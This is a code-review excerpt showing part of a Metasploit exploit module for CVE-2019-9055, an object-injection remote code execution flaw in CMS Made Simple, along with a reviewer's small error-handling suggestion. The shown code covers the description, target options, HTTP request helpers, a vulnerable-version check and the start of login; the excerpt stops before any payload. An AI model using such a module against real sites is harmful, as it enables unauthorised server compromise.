modules/exploits/multi/http/cmsms_object_injection_rce.rb

```diff
@@ -0,0 +1,162 @@
+      'Description' => %q(
+        An issue was discovered in CMS Made Simple 2.2.8.
+        In the module DesignManager (in the files action.admin_bulk_css.php
+        and action.admin_bulk_template.php), with an unprivileged user
+        with Designer permission, it is possible reach an unserialize
+        call with a crafted value in the m1_allparms parameter,
+        and achieve object injection.
+
+        This module has been successfully tested on CMS Made Simple versions
+        2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1.
+      ),
+      'Author' => [
+        'Daniele Scanu danielescanu20[at]gmail.com', # Discovered and exploit. twitter.com/sk4pwn
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2019-9055'],
+        ['CWE', '74'],
+        ['URL', 'https://newsletter.cmsmadesimple.org/w/89247Qog4jCRCuRinvhsofwg'],
+        ['URL', 'https://www.cmsmadesimple.org/2019/03/Announcing-CMS-Made-Simple-v2.2.10-Spuzzum']
+      ],
+      'Privileged' => false,
+      'Platform' => ['php'],
+      'Arch' => [ARCH_PHP],
+      'Targets' => [['Automatic', {}]],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Mar 26 2019'))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base cmsms directory path', '/']),
+        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
+        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+      ]
+    )
+    @csrf = nil
+    @cookies = nil
+    @csrf_name = nil
+  end
+
+  def multipart_form_data(uri, data, message)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', uri),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{message.bound}",
+      'cookie' => @cookies
+    )
+  end
+
+  def post(uri, data)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', uri),
+      'method' => 'POST',
+      'vars_post' => data,
+      'cookie' => @cookies
+    )
+  end
+
+  def get(path, filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, path, filename),
+      'method' => 'GET'
+    )
+  end
+
+  def check
+    res = get('', 'index.php')
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body.match?(/CMS Made Simple/i)
+      return CheckCode::Safe
+    end
+
+    version = Gem::Version.new(res.body.scan(/CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/).flatten.first)
+    vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+
+    if version <= Gem::Version.new('2.2.9.1')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def login
+    data = {
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'loginsubmit' => 'Submit'
+    }
+    res = post('login.php', data)
+
+    unless res
+      fail_with(Failure::NotFound,
```

Comment:
Usually a `nil` `res` implies that the connection failed.

```suggestion
      fail_with(Failure::Unreachable,
```